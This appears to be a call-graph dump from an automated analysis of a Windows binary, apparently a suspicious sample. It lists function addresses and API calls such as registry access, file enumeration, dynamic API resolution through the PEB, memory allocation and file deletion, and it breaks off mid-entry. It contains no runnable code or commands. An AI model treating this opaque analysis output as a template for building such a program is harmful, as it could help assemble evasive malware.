10561->10630 10563 408946 10563->10522 10564 4031e5 4 API calls 10566 40887e 10564->10566 10565 40893e 10633 404a39 10565->10633 10566->10563 10566->10564 10566->10565 10568 402b7c 2 API calls 10566->10568 10568->10566 10570 402b7c 2 API calls 10569->10570 10571 4087e7 10570->10571 10572 40885a 10571->10572 10573 4031e5 4 API calls 10571->10573 10581 408749 10572->10581 10576 408802 10573->10576 10574 408853 10575 402bab 2 API calls 10574->10575 10575->10572 10576->10574 10578 40884d 10576->10578 10642 408522 10576->10642 10646 4084b4 10576->10646 10649 4084d4 10578->10649 10582 404b8f 5 API calls 10581->10582 10584 408765 10582->10584 10583 4031e5 4 API calls 10583->10584 10584->10583 10585 408522 4 API calls 10584->10585 10586 4087c7 10584->10586 10588 4087cf 10584->10588 10585->10584 10587 404a39 5 API calls 10586->10587 10587->10588 10589 4085d1 10588->10589 10591 4086c2 10589->10591 10595 4085e9 10589->10595 10591->10532 10592 402bab 2 API calls 10592->10595 10593 4031e5 4 API calls 10593->10595 10595->10591 10595->10592 10595->10593 10655 4089e6 10595->10655 10674 4086c9 10595->10674 10678 4036a3 10595->10678 10598 4031e5 4 API calls 10597->10598 10599 408386 10598->10599 10599->10552 10599->10556 10601 40816f 10600->10601 10602 4081b6 10601->10602 10603 4081fd 10601->10603 10614 4081ef 10601->10614 10605 405872 4 API calls 10602->10605 10604 405872 4 API calls 10603->10604 10606 408213 10604->10606 10607 4081cf 10605->10607 10608 405872 4 API calls 10606->10608 10609 405872 4 API calls 10607->10609 10610 408222 10608->10610 10611 4081df 10609->10611 10612 405872 4 API calls 10610->10612 10613 405872 4 API calls 10611->10613 10612->10614 10613->10614 10614->10560 10616 40808c 10615->10616 10617 4080d2 10616->10617 10618 408119 10616->10618 10629 40810b 10616->10629 10620 405872 4 API calls 10617->10620 10619 405872 4 API calls 10618->10619 10621 40812f 10619->10621 10622 4080eb 10620->10622 10623 405872 4 API calls 10621->10623 10624 405872 4 API calls 10622->10624 10625 40813e 10623->10625 10626 4080fb 10624->10626 10627 405872 4 API calls 10625->10627 10628 405872 4 API calls 10626->10628 10627->10629 10628->10629 10629->10560 10636 404a19 10630->10636 10632 404ba0 10632->10566 10639 4049ff 10633->10639 10635 404a44 10635->10563 10637 4031e5 4 API calls 10636->10637 10638 404a2c RegOpenKeyW 10637->10638 10638->10632 10640 4031e5 4 API calls 10639->10640 10641 404a12 RegCloseKey 10640->10641 10641->10635 10643 408534 10642->10643 10645 4085af 10643->10645 10652 4084ee 10643->10652 10645->10576 10647 4031e5 4 API calls 10646->10647 10648 4084c7 10647->10648 10648->10576 10650 4031e5 4 API calls 10649->10650 10651 4084e7 10650->10651 10651->10574 10653 4031e5 4 API calls 10652->10653 10654 408501 10653->10654 10654->10645 10656 4031e5 4 API calls 10655->10656 10657 408a06 10656->10657 10658 408b21 10657->10658 10659 4031e5 4 API calls 10657->10659 10658->10595 10662 408a32 10659->10662 10660 408b17 10690 403649 10660->10690 10662->10660 10681 403666 10662->10681 10665 408b0e 10687 40362f 10665->10687 10666 4031e5 4 API calls 10668 408a88 10666->10668 10668->10665 10669 4031e5 4 API calls 10668->10669 10670 408ac4 10669->10670 10671 405b6f 6 API calls 10670->10671 10672 408aff 10671->10672 10672->10665 10684 408508 10672->10684 10675 4086e2 10674->10675 10676 408744 10674->10676 10675->10676 10677 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10675->10677 10676->10595 10677->10675 10679 4031e5 4 API calls 10678->10679 10680 4036b5 10679->10680 10680->10595 10682 4031e5 4 API calls 10681->10682 10683 403679 10682->10683 10683->10665 10683->10666 10685 4031e5 4 API calls 10684->10685 10686 40851b 10685->10686 10686->10665 10688 4031e5 4 API calls 10687->10688 10689 403642 10688->10689 10689->10660 10691 4031e5 4 API calls 10690->10691 10692 40365c 10691->10692 10692->10658 11332 41045c 11333 4040bb 13 API calls 11332->11333 11334 410477 11333->11334 11335 41060b 11334->11335 11363 407851 11334->11363 11337 41048f 11338 407851 2 API calls 11337->11338 11344 410604 11337->11344 11340 4104a9 11338->11340 11339 403f9e 5 API calls 11339->11335 11345 4105e0 11340->11345 11346 405ae9 6 API calls 11340->11346 11348 4105eb 11340->11348 11349 41056f 11340->11349 11341 402bab 2 API calls 11343 4105fb 11341->11343 11342 402bab 2 API calls 11342->11344 11343->11342 11344->11339 11347 402bab 2 API calls 11345->11347 11345->11348 11346->11340 11347->11348 11348->11341 11348->11343 11349->11345 11350 4105d6 11349->11350 11352 412269 6 API calls 11349->11352 11351 402bab 2 API calls 11350->11351 11351->11345 11353 410580 11352->11353 11353->11350 11354 405872 4 API calls 11353->11354 11355 410599 11354->11355 11356 405872 4 API calls 11355->11356 11357 4105a9 11356->11357 11358 405872 4 API calls 11357->11358 11359 4105bb 11358->11359 11360 405872 4 API calls 11359->11360 11361 4105cd 11360->11361 11362 402bab 2 API calls 11361->11362 11362->11350 11364 407866 11363->11364 11365 402b7c 2 API calls 11364->11365 11366 407899 11364->11366 11365->11366 11366->11337 10754 40f561 10757 40f4b6 10754->10757 10758 413b28 7 API calls 10757->10758 10759 40f4bf 10758->10759 10760 405b6f 6 API calls 10759->10760 10761 402bab GetProcessHeap HeapFree 10759->10761 10762 413a58 14 API calls 10759->10762 10763 40f559 10759->10763 10760->10759 10761->10759 10762->10759 10767 403b64 10768 4031e5 4 API calls 10767->10768 10769 403b77 PathFileExistsW 10768->10769 11398 40d069 11399 404bee 7 API calls 11398->11399 11400 40d080 11399->11400 11401 404bee 7 API calls 11400->11401 11426 40d1e2 11400->11426 11402 40d099 11401->11402 11403 404bee 7 API calls 11402->11403 11404 40d0a7 11403->11404 11405 404ba7 4 API calls 11404->11405 11406 40d0b6 11405->11406 11407 404bee 7 API calls 11406->11407 11408 40d0c5 11407->11408 11409 404c4e 6 API calls 11408->11409 11410 40d0dc 11409->11410 11411 404bee 7 API calls 11410->11411 11412 40d0eb 11411->11412 11413 404ba7 4 API calls 11412->11413 11414 40d0fa 11413->11414 11415 404bee 7 API calls 11414->11415 11416 40d109 11415->11416 11417 404c4e 6 API calls 11416->11417 11418 40d123 11417->11418 11419 405872 4 API calls 11418->11419 11418->11426 11420 40d14a 11419->11420 11421 405872 4 API calls 11420->11421 11422 40d159 11421->11422 11423 405872 4 API calls 11422->11423 11424 40d16b 11423->11424 11425 405781 4 API calls 11424->11425 11427 40d179 11425->11427 11428 405872 4 API calls 11427->11428 11429 40d18b 11428->11429 11430 405762 4 API calls 11429->11430 11431 40d19f 11430->11431 11432 405872 4 API calls 11431->11432 11433 40d1b1 11432->11433 11434 405781 4 API calls 11433->11434 11435 40d1bf 11434->11435 11436 405872 4 API calls 11435->11436 11437 40d1d1 11436->11437 11438 405762 4 API calls 11437->11438 11438->11426 10793 40f16e 10794 4056bf 2 API calls 10793->10794 10795 40f17b 10794->10795 10796 412093 13 API calls 10795->10796 10797 40f19e 10796->10797 10798 412093 13 API calls 10797->10798 10799 40f1b6 10798->10799 10800 412093 13 API calls 10799->10800 10801 40f1cc 10800->10801 10802 412093 13 API calls 10801->10802 10803 40f1e2 10802->10803 10804 413aca 4 API calls 10803->10804 10805 40f1ef 10804->10805 10806 405695 2 API calls 10805->10806 10807 40f1fa 10806->10807 10808 40ce71 10809 413b28 7 API calls 10808->10809 10810 40ce78 10809->10810 10811 405b6f 6 API calls 10810->10811 10813 40ce83 10811->10813 10812 403fbf 7 API calls 10814 40cecc 10812->10814 10816 40ceba 10813->10816 10819 403d74 11 API calls 10813->10819 10820 40cec1 10813->10820 10815 40cefb 10814->10815 10818 403d74 11 API calls 10814->10818 10817 402bab 2 API calls 10816->10817 10817->10820 10821 40cee7 10818->10821 10822 40cead 10819->10822 10820->10812 10823 40cef4 10821->10823 10824 402bab 2 API calls 10821->10824 10822->10816 10826 402bab 2 API calls 10822->10826 10825 402bab 2 API calls 10823->10825 10824->10823 10825->10815 10826->10816 10827 406472 10828 4031e5 4 API calls 10827->10828 10829 406484 Sleep 10828->10829 11466 40ea77 11467 404bee 7 API calls 11466->11467 11468 40ea8e 11467->11468 11469 404bee 7 API calls 11468->11469 11474 40eb24 11468->11474 11470 40eaa7 11469->11470 11471 404bee 7 API calls 11470->11471 11472 40eab5 11471->11472 11473 404c4e 6 API calls 11472->11473 11475 40eacc 11473->11475 11475->11474 11476 405872 4 API calls 11475->11476 11477 40eaf2 11476->11477 11478 405872 4 API calls 11477->11478 11479 40eb01 11478->11479 11480 405872 4 API calls 11479->11480 11481 40eb13 11480->11481 11482 405762 4 API calls 11481->11482 11482->11474 11515 40f204 11516 405781 4 API calls 11515->11516 11517 40f214 11516->11517 11518 4057df 14 API calls 11517->11518 11519 40f226 11518->11519 10887 403c08 10888 4031e5 4 API calls 10887->10888 10889 403c1a DeleteFileW 10888->10889 10890 410a09 10891 41219c 15 API calls 10890->10891 10892 410a1b 10891->10892 10893 41219c 15 API calls 10892->10893 10894 410a23 10893->10894 10895 41219c 15 API calls 10894->10895 10896 410a2c 10895->10896 10897 41219c 15 API calls 10896->10897 10898 410a38 10897->10898 10899 404b22 7 API calls 10898->10899 10900 410a4c 10899->10900 10901 410a7a 10900->10901 10902 403fbf 7 API calls 10900->10902 10903 410a5c 10902->10903 10904 410a71 10903->10904 10906 413a58 14 API calls 10903->10906 10905 402bab 2 API calls 10904->10905 10905->10901 10907 410a6b 10906->10907 10908 402bab 2 API calls 10907->10908 10908->10904 11520 410d09 11521 410d56 11520->11521 11522 410d17 11520->11522 11524 413a58 14 API calls 11521->11524 11536 406642 11522->11536 11526 410d6f 11524->11526 11527 4056bf 2 API calls 11528 410d2e 11527->11528 11549 405641 11528->11549 11530 410d41 11531 413aca 4 API calls 11530->11531 11532 410d4a 11531->11532 11533 405695 2 API calls 11532->11533 11534 410d50 11533->11534 11535 4036a3 4 API calls 11534->11535 11535->11521 11537 406662 11536->11537 11538 4031e5 4 API calls 11537->11538 11539 406676 11538->11539 11553 4066bf 11539->11553 11544 4066b1 11547 4036a3 4 API calls 11544->11547 11545 4066a7 11546 4036a3 4 API calls 11545->11546 11548 4066ac 11546->11548 11547->11548 11548->11521 11548->11527 11550 405673 11549->11550 11551 40564d 11549->11551 11550->11530 11551->11550 11552 4056fc 4 API calls 11551->11552 11552->11550 11554 4031e5 4 API calls 11553->11554 11555 4066dc 11554->11555 11556 4066f6 SetLastError 11555->11556 11557 406708 GetLastError 11555->11557 11558 406693 11556->11558 11557->11558 11559 406713 11557->11559 11575 406455 11558->11575 11560 4031e5 4 API calls 11559->11560 11561 406725 11560->11561 11561->11558 11562 4031e5 4 API calls 11561->11562 11563 40673f 11562->11563 11564 406753 11563->11564 11565 406749 11563->11565 11567 4031e5 4 API calls 11564->11567 11566 4036a3 4 API calls 11565->11566 11566->11558 11568 406761 11567->11568 11569 40678a 11568->11569 11570 40677c 11568->11570 11572 4036a3 4 API calls 11569->11572 11571 4036a3 4 API calls 11570->11571 11573 406781 11571->11573 11572->11558 11574 4036a3 4 API calls 11573->11574 11574->11558 11576 4031e5 4 API calls 11575->11576 11577 406468 11576->11577 11577->11544 11577->11545 10909 40c509 10910 412093 13 API calls 10909->10910 10911 40c51e 10910->10911 10918 40910d 10919 404b22 7 API calls 10918->10919 10920 409124 10919->10920 10921 40917a 10920->10921 10922 405b6f 6 API calls 10920->10922 10923 40913e 10922->10923 10925 404b22 7 API calls 10923->10925 10930 409173 10923->10930 10924 402bab 2 API calls 10924->10921 10926 409153 10925->10926 10927 409408 18 API calls 10926->10927 10932 40916a 10926->10932 10929 409164 10927->10929 10928 402bab 2 API calls 10928->10930 10931 402bab 2 API calls 10929->10931 10930->10924 10931->10932 10932->10928 10936 410410 10937 4056bf 2 API calls 10936->10937 10938 41041b 10937->10938 10939 412093 13 API calls 10938->10939 10940 41043c 10939->10940 10941 413aca 4 API calls 10940->10941 10942 410449 10941->10942 10943 405695 2 API calls 10942->10943 10944 410454 10943->10944 10971 40c71a 10972 41219c 15 API calls 10971->10972 10973 40c728 10972->10973 11633 410b1a 11634 404bee 7 API calls 11633->11634 11635 410b31 11634->11635 11636 404bee 7 API calls 11635->11636 11646 410c6d 11635->11646 11637 410b5a 11636->11637 11638 404bee 7 API calls 11637->11638 11639 410b69 11638->11639 11640 404bee 7 API calls 11639->11640 11641 410b78 11640->11641 11642 404ba7 4 API calls 11641->11642 11643 410b86 11642->11643 11644 404ba7 4 API calls 11643->11644 11645 410b95 11644->11645 11645->11646 11647 405872 4 API calls 11645->11647 11648 410bd7 11647->11648 11649 405872 4 API calls 11648->11649 11650 410be8 11649->11650 11651 405872 4 API calls 11650->11651 11652 410bf9 11651->11652 11653 405781 4 API calls 11652->11653 11654 410c07 11653->11654 11655 405781 4 API calls 11654->11655 11659 410c15 11655->11659 11656 410c4e 11657 405762 4 API calls 11656->11657 11658 410c60 11657->11658 11658->11646 11661 403f9e 5 API calls 11658->11661 11659->11656 11666 405e5a 11659->11666 11661->11646 11663 4040bb 13 API calls 11664 410c44 11663->11664 11665 402bab 2 API calls 11664->11665 11665->11656 11667 402b7c 2 API calls 11666->11667 11669 405e72 11667->11669 11668 405ea3 11668->11656 11668->11663 11669->11668 11670 4031e5 4 API calls 11669->11670 11671 405e94 11670->11671 11671->11668 11672 402bab 2 API calls 11671->11672 11672->11668 11673 40f81c 11674 404bee 7 API calls 11673->11674 11675 40f833 11674->11675 11676 404bee 7 API calls 11675->11676 11686 40f94f 11675->11686 11677 40f85c 11676->11677 11678 404bee 7 API calls 11677->11678 11679 40f86b 11678->11679 11680 404bee 7 API calls 11679->11680 11681 40f87a 11680->11681 11682 404bee 7 API calls 11681->11682 11683 40f888 11682->11683 11684 404ba7 4 API calls 11683->11684 11685 40f897 11684->11685 11685->11686 11687 405872 4 API calls 11685->11687 11688 40f8d8 11687->11688 11689 405872 4 API calls 11688->11689 11690 40f8ea 11689->11690 11691 405872 4 API calls 11690->11691 11692 40f8fa 11691->11692 11693 405872 4 API calls 11692->11693 11694 40f90c 11693->11694 11695 405781 4 API calls 11694->11695 11696 40f91d 11695->11696 11697 4040bb 13 API calls 11696->11697 11698 40f92d 11697->11698 11699 405762 4 API calls 11698->11699 11700 40f93f 11699->11700 11700->11686 11701 403f9e 5 API calls 11700->11701 11701->11686 10986 402c1f 10987 4031e5 4 API calls 10986->10987 10988 402c31 LoadLibraryW 10987->10988 11711 407e1f 11712 407e2c 11711->11712 11721 407e61 11711->11721 11715 407e3e 11712->11715 11717 402bab 2 API calls 11712->11717 11719 407e51 11712->11719 11713 407eb6 11713->11719 11720 402bab 2 API calls 11713->11720 11714 407ea6 11714->11713 11716 402bab 2 API calls 11714->11716 11718 402bab 2 API calls 11715->11718 11725 407ed4 11715->11725 11716->11713 11717->11715 11718->11719 11723 402bab 2 API calls 11719->11723 11719->11725 11720->11719 11721->11713 11721->11714 11722 405872 4 API calls 11721->11722 11724 407e86 11722->11724 11723->11725 11726 405872 4 API calls 11724->11726 11727 407e96 11726->11727 11728 405872 4 API calls 11727->11728 11728->11714 11729 40fa23 11730 40fa39 11729->11730 11731 410293 11730->11731 11732 405b6f 6 API calls 11730->11732 11733 40ffcc 11732->11733 11733->11731 11734 4040bb 13 API calls 11733->11734 11735 40ffeb 11734->11735 11736 41028c 11735->11736 11739 402b7c 2 API calls 11735->11739 11784 41027d 11735->11784 11737 402bab 2 API calls 11736->11737 11737->11731 11738 403f9e 5 API calls 11738->11736 11740 41001e 11739->11740 11741 40a423 4 API calls 11740->11741 11740->11784 11742 41004a 11741->11742 11743 4031e5 4 API calls 11742->11743 11744 41005c 11743->11744 11745 4031e5 4 API calls 11744->11745 11746 410079 11745->11746 11747 4031e5 4 API calls 11746->11747 11748 410096 11747->11748 11749 4031e5 4 API calls 11748->11749 11750 4100b0 11749->11750 11751 4031e5 4 API calls 11750->11751 11752 4100cd 11751->11752 11753 4031e5 4 API calls 11752->11753 11754 4100ea 11753->11754 11785 412516 11754->11785 11756 4100fd 11757 40642c 5 API calls 11756->11757 11758 41013e 11757->11758 11759 410142 11758->11759 11760 41019f 11758->11760 11761 40488c 5 API calls 11759->11761 11763 4031e5 4 API calls 11760->11763 11762 410151 11761->11762 11764 41019c 11762->11764 11765 404866 4 API calls 11762->11765 11778 4101bb 11763->11778 11766 41022a 11764->11766 11767 40642c 5 API calls 11764->11767 11768 410163 11765->11768 11774 413a58 14 API calls 11766->11774 11769 410201 11767->11769 11770 41018e 11768->11770 11773 406c4c 6 API calls 11768->11773 11771 410205 11769->11771 11772 41022f 11769->11772 11775 403c40 5 API calls 11770->11775 11776 4126a7 7 API calls 11771->11776 11788 4125db 11772->11788 11779 410178 11773->11779 11780 41026e 11774->11780 11775->11764 11776->11766 11781 4031e5 4 API calls 11778->11781 11782 406c4c 6 API calls 11779->11782 11783 402bab 2 API calls 11780->11783 11781->11764 11782->11770 11783->11784 11784->11738 11786 4031e5 4 API calls 11785->11786 11787 412539 11786->11787 11787->11756 11789 40488c 5 API calls 11788->11789 11790 4125ec 11789->11790 11791 4031e5 4 API calls 11790->11791 11795 41269f 11790->11795 11792 412609 11791->11792 11794 4031e5 4 API calls 11792->11794 11801 41268f 11792->11801 11793 403c40 5 API calls 11793->11795 11796 41262a 11794->11796 11795->11766 11797 412675 11796->11797 11805 4124f1 11796->11805 11799 4031e5 4 API calls 11797->11799 11799->11801 11801->11793 11802 412663 11804 4031e5 4 API calls 11802->11804 11803 4124f1 4 API calls 11803->11802 11804->11797 11806 4031e5 4 API calls 11805->11806 11807 412503 11806->11807 11807->11802 11807->11803 11819 410927 11820 4044ee 8 API calls 11819->11820 11821 41093d 11820->11821 11822 4056bf 2 API calls 11821->11822 11833 4109a4 11821->11833 11825 410954 11822->11825 11823 4044ee 8 API calls 11823->11825 11825->11823 11826 402bab 2 API calls 11825->11826 11827 410990 11825->11827 11834 41080e 11825->11834 11826->11825 11828 413aca 4 API calls 11827->11828 11829 410998 11828->11829 11830 405695 2 API calls 11829->11830 11831 41099e 11830->11831 11832 402bab 2 API calls 11831->11832 11832->11833 11836 410821 11834->11836 11835 41091f 11835->11825 11836->11835 11846 410701 11836->11846 11839 405872 4 API calls 11840 410900 11839->11840 11841 405872 4 API calls 11840->11841 11842 41090d 11841->11842 11843 405872 4 API calls 11842->11843 11844 410919 11843->11844 11845 402bab 2 API calls 11844->11845 11845->11835 11847 405f08 4 API calls 11846->11847 11849 410713 11847->11849 11848 410804 11848->11835 11848->11839 11849->11848 11850 402b7c 2 API calls 11849->11850 11854 410748 11850->11854 11851 4107fd 11852 402bab 2 API calls 11851->11852 11852->11848 11853 402b7c 2 API calls 11856 4107ad 11853->11856 11854->11851 11854->11853 11855 402bab 2 API calls 11855->11851 11856->11855 11056 40f12f 11057 41219c 15 API calls 11056->11057 11058 40f13f 11057->11058 11059 41219c 15 API calls 11058->11059 11060 40f14c 11059->11060 11061 41219c 15 API calls 11060->11061 11062 40f159 11061->11062 11063 41219c 15 API calls 11062->11063 11064 40f166 11063->11064 11071 40ed35 11072 4056bf 2 API calls 11071->11072 11073 40ed42 11072->11073 11074 412093 13 API calls 11073->11074 11075 40ed63 11074->11075 11076 412093 13 API calls 11075->11076 11077 40ed73 11076->11077 11078 413aca 4 API calls 11077->11078 11079 40ed80 11078->11079 11080 405695 2 API calls 11079->11080 11081 40ed8e 11080->11081 9610 40f3c5 9615 41219c 9610->9615 9613 41219c 15 API calls 9614 40f3e1 9613->9614 9616 4121b1 9615->9616 9617 40f3d3 9615->9617 9618 4121be 9616->9618 9624 4121c5 9616->9624 9617->9613 9664 413ba4 9618->9664 9621 4121c3 9621->9617 9641 405b6f 9621->9641 9623 4121ca 9633 404056 9623->9633 9624->9623 9627 412210 9624->9627 9626 41224d 9626->9617 9631 402bab 2 API calls 9626->9631 9627->9617 9669 403fbf 9627->9669 9631->9617 9680 402b7c GetProcessHeap RtlAllocateHeap 9633->9680 9635 404066 9638 404095 9635->9638 9682 4031e5 9635->9682 9638->9621 9639 404099 9640 402bab 2 API calls 9639->9640 9640->9638 9642 405b7d 9641->9642 9643 402b7c 2 API calls 9642->9643 9644 405b99 9643->9644 9650 405c02 9644->9650 9718 4059b8 9644->9718 9646 405c09 9648 402bab 2 API calls 9646->9648 9647 405bba 9647->9646 9649 402b7c 2 API calls 9647->9649 9648->9650 9651 405bdd 9649->9651 9650->9626 9654 413a58 9650->9654 9651->9646 9652 405be4 9651->9652 9653 402bab 2 API calls 9652->9653 9653->9650 9655 413a63 9654->9655 9663 412245 9654->9663 9655->9663 9721 405781 9655->9721 9658 405781 4 API calls 9659 413aa0 9658->9659 9724 4057df 9659->9724 9662 405781 4 API calls 9662->9663 9677 402bab 9663->9677 9665 413bad 9664->9665 9666 404056 7 API calls 9665->9666 9668 413bb8 9665->9668 9667 413bc5 9666->9667 9667->9621 9668->9621 9670 402b7c 2 API calls 9669->9670 9671 403fcf 9670->9671 9672 403ff4 9671->9672 9843 403b98 9671->9843 9672->9621 9675 403ff8 GetLastError 9676 402bab 2 API calls 9675->9676 9676->9672 9678 402bb4 GetProcessHeap HeapFree 9677->9678 9679 402bc6 9677->9679 9678->9679 9679->9626 9681 402b98 9680->9681 9681->9635 9683 4031f3 9682->9683 9684 403236 9682->9684 9683->9684 9687 403208 9683->9687 9693 4030a5 9684->9693 9686 403224 9689 403258 SHGetFolderPathW 9686->9689 9691 4031e5 4 API calls 9686->9691 9699 403263 9687->9699 9689->9638 9689->9639 9690 40320d 9690->9689 9692 4030a5 4 API calls 9690->9692 9691->9689 9692->9686 9705 402ca4 9693->9705 9695 4030b0 9696 4030b5 9695->9696 9709 4030c4 9695->9709 9696->9686 9700 40326d 9699->9700 9701 402b7c 2 API calls 9700->9701 9704 4032b7 9700->9704 9702 40328c 9701->9702 9703 402b7c 2 API calls 9702->9703 9703->9704 9704->9690 9706 403079 9705->9706 9707 40307c 9706->9707 9713 40317b GetPEB 9706->9713 9707->9695 9710 4030eb 9709->9710 9711 4030c0 9710->9711 9715 402c03 9710->9715 9711->9686 9714 40319b 9713->9714 9714->9707 9716 4031e5 3 API calls 9715->9716 9717 402c15 GetProcAddress 9716->9717 9717->9711 9719 4031e5 4 API calls 9718->9719 9720 4059cb 9719->9720 9720->9647 9739 405797 9721->9739 9723 405792 9723->9658 9725 405832 9724->9725 9726 4057eb 9724->9726 9725->9662 9725->9663 9726->9725 9749 4040bb 9726->9749 9729 405839 9731 405853 9729->9731 9776 405627 9729->9776 9730 40582c 9773 403f9e 9730->9773 9787 405762 9731->9787 9737 403f9e 5 API calls 9737->9725 9740 4057bd 9739->9740 9741 4057a1 9739->9741 9740->9723 9741->9740 9743 4056fc 9741->9743 9744 405714 9743->9744 9745 402b7c 2 API calls 9744->9745 9746 405730 9745->9746 9747 402bab 2 API calls 9746->9747 9748 405752 9746->9748 9747->9748 9748->9740 9750 4031e5 4 API calls 9749->9750 9751 4040d5 CreateFileW 9750->9751 9752 4040f8 9751->9752 9753 40418d 9751->9753 9755 4031e5 4 API calls 9752->9755 9754 404183 9753->9754 9793 403c90 9753->9793 9754->9725 9754->9729 9754->9730 9759 404105 9755->9759 9763 4031e5 4 API calls 9759->9763 9772 40416d 9759->9772 9762 402bab 2 API calls 9762->9754 9766 404131 VirtualAlloc 9763->9766 9764 4040bb 10 API calls 9765 4041c8 9764->9765 9765->9762 9767 404142 9766->9767 9766->9772 9768 4031e5 4 API calls 9767->9768 9769 40414f ReadFile 9768->9769 9770 404160 9769->9770 9769->9772 9771 4031e5 4 API calls 9770->9771 9771->9772 9790 403c40 9772->9790 9774 4031e5 4 API calls 9773->9774 9775 403fb1 VirtualFree 9774->9775 9775->9725 9777 4031e5 4 API calls 9776->9777 9778 40563a 9777->9778 9779 405872 9778->9779 9781 405881 9779->9781 9780 4058bc 9783 405797 4 API calls 9780->9783 9785 4058af 9780->9785 9781->9780 9840 4058d4 9781->9840 9783->9785 9785->9731 9786 405781 4 API calls 9786->9780 9788 405781 4 API calls 9787->9788 9789 405770 9788->9789 9789->9737 9791 4031e5 4 API calls 9790->9791 9792 403c52 CloseHandle 9791->9792 9792->9754 9794 403ca3 9793->9794 9797 403caa 9793->9797 9820 405dc5 9794->9820 9796 404056 7 API calls 9798 403cbe 9796->9798 9797->9796 9799 403d3a 9797->9799 9800 403d2e 9798->9800 9801 403d17 9798->9801 9802 403ccf 9798->9802 9799->9754 9816 403c59 9799->9816 9800->9799 9803 402bab 2 API calls 9800->9803 9804 405b6f 6 API calls 9801->9804 9805 405b6f 6 API calls 9802->9805 9803->9799 9806 403d14 9804->9806 9807 403cdd 9805->9807 9810 402bab 2 API calls 9806->9810 9808 405b6f 6 API calls 9807->9808 9809 403cee 9808->9809 9809->9806 9825 403d4d 9809->9825 9810->9800 9813 403d0b 9815 402bab 2 API calls 9813->9815 9815->9806 9817 403c21 9816->9817 9818 4031e5 4 API calls 9817->9818 9819 403c33 9818->9819 9819->9764 9819->9765 9834 406799 9820->9834 9822 405dd5 9823 402b7c 2 API calls 9822->9823 9824 405dfe 9823->9824 9824->9797 9837 403bb7 9825->9837 9827 403cfe 9827->9813 9828 403c62 9827->9828 9829 403d4d 5 API calls 9828->9829 9830 403c6d 9829->9830 9831 403c72 9830->9831 9832 4031e5 4 API calls 9830->9832 9831->9813 9833 403c87 CreateDirectoryW 9832->9833 9833->9813 9835 4031e5 4 API calls 9834->9835 9836 4067ad 9835->9836 9836->9822 9838 4031e5 4 API calls 9837->9838 9839 403bc9 GetFileAttributesW 9838->9839 9839->9827 9841 405797 4 API calls 9840->9841 9842 4058a8 9841->9842 9842->9785 9842->9786 9844 4031e5 4 API calls 9843->9844 9845 403baa 9844->9845 9845->9672 9845->9675 11234 40ebc6 11235 4040bb 13 API calls 11234->11235 11236 40ebdf 11235->11236 11241 40ecd7 11236->11241 11254 407795 11236->11254 11239 403f9e 5 API calls 11239->11241 11240 4056bf 2 API calls 11252 40ec12 11240->11252 11242 40ecb5 11243 402bab 2 API calls 11242->11243 11244 40ecbd 11243->11244 11245 413aca 4 API calls 11244->11245 11247 40ecc7 11245->11247 11246 407908 GetProcessHeap RtlAllocateHeap 11246->11252 11248 405695 2 API calls 11247->11248 11249 40eccd 11248->11249 11249->11239 11251 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 11251->11252 11252->11242 11252->11246 11252->11251 11253 402bab GetProcessHeap HeapFree 11252->11253 11265 412269 11252->11265 11253->11252 11255 4077ab 11254->11255 11262 4077b3 11255->11262 11272 405ae9 11255->11272 11257 4077e1 11258 407802 11257->11258 11259 4077f8 11257->11259 11257->11262 11261 402b7c 2 API calls 11258->11261 11260 402bab 2 API calls 11259->11260 11260->11262 11263 407811 11261->11263 11262->11240 11262->11249 11264 402bab 2 API calls 11263->11264 11264->11262 11288 40374e 11265->11288 11268 4037be 4 API calls 11269 412291 11268->11269 11270 402bab 2 API calls 11269->11270 11271 412299 11270->11271 11271->11252 11273 405af7 11272->11273 11274 402b7c 2 API calls 11273->11274 11275 405b03 11274->11275 11284 405b5a 11275->11284 11285 405998 11275->11285 11277 405b21 11278 405b61 11277->11278 11280 402b7c 2 API calls 11277->11280 11279 402bab 2 API calls 11278->11279 11279->11284 11281 405b39 11280->11281 11281->11278 11282 405b40 11281->11282 11283 402bab 2 API calls 11282->11283 11283->11284 11284->11257 11286 4031e5 4 API calls 11285->11286 11287 4059ab 11286->11287 11287->11277 11289 402b7c 2 API calls 11288->11289 11291 40375f 11289->11291 11290 4037a3 11290->11268 11290->11271 11291->11290 11292 4031e5 4 API calls 11291->11292 11293 40378f 11292->11293 11293->11290 11294 402bab 2 API calls 11293->11294 11294->11290 10443 410cd1 10448 412093 10443->10448 10446 412093 13 API calls 10447 410cff 10446->10447 10450 4120a5 10448->10450 10468 410cf1 10448->10468 10449 4120b3 10451 404056 7 API calls 10449->10451 10450->10449 10455 412100 10450->10455 10453 4120ba 10451->10453 10452 412152 10470 403d74 10452->10470 10453->10452 10454 405b6f 6 API calls 10453->10454 10453->10468 10459 412125 10454->10459 10457 403fbf 7 API calls 10455->10457 10455->10468 10457->10453 10459->10452 10461 412139 10459->10461 10462 41214d 10459->10462 10460 41218c 10465 402bab 2 API calls 10460->10465 10460->10468 10464 402bab 2 API calls 10461->10464 10466 402bab 2 API calls 10462->10466 10463 402bab 2 API calls 10463->10460 10467 41213e 10464->10467 10465->10468 10466->10452 10469 402bab 2 API calls 10467->10469 10468->10446 10469->10468 10471 403d87 10470->10471 10472 405b6f 6 API calls 10471->10472 10485 403ea3 10471->10485 10474 403da3 10472->10474 10473 405b6f 6 API calls 10476 403eb9 10473->10476 10477 4031e5 4 API calls 10474->10477 10474->10485 10475 403f6f 10475->10460 10475->10463 10476->10475 10478 4031e5 4 API calls 10476->10478 10479 403dbc FindFirstFileW 10477->10479 10480 403ed3 FindFirstFileW 10478->10480 10481 403e9c 10479->10481 10501 403dd1 10479->10501 10482 403f8d 10480->10482 10500 403ee8 10480->10500 10483 402bab 2 API calls 10481->10483 10484 402bab 2 API calls 10482->10484 10483->10485 10484->10475 10485->10473 10486 4031e5 4 API calls 10487 403e84 FindNextFileW 10486->10487 10488 403e96 10487->10488 10487->10501 10509 403bef 10488->10509 10490 405b6f 6 API calls 10490->10500 10491 4031e5 4 API calls 10493 403f50 FindNextFileW 10491->10493 10492 405b6f 6 API calls 10492->10501 10494 403f87 10493->10494 10493->10500 10496 403bef 5 API calls 10494->10496 10495 403f75 10497 402bab 2 API calls 10495->10497 10496->10482 10499 403f7b 10497->10499 10498 403d74 7 API calls 10498->10501 10502 403bef 5 API calls 10499->10502 10500->10490 10500->10491 10500->10495 10503 402bab 2 API calls 10500->10503 10501->10486 10501->10492 10501->10498 10504 402bab 2 API calls 10501->10504 10505 403f63 10501->10505 10502->10475 10503->10500 10504->10501 10506 